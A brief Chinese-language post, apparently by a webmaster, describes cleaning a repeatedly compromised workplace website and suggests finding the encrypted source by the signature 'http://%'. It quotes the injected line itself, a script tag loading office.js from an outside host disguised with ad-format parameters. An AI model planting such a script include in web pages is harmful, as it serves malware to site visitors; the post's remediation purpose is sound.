最近单位的网站被挂马,弄了一个星期,现在终于好了,网站反复被挂,代码清除了,过段时间又有了。
代码如下:<script language="javascript" src="http://officeev.endofinternet.net/office.js?google_ad_format=728x90_as"></script>
解决办法:依然是遍历所有文件,然后查找此代码,但是此代码的源头被加密保存在某个文件中,所以单独搜索此代码并不能根除木马。因为一般加密代码,都少不了这个关键字就是:“http://%”,呵呵,再怎么加密还是有特征的!
下面就简单了,用SR遍历所有文件,找到后,全部删除,就ok了!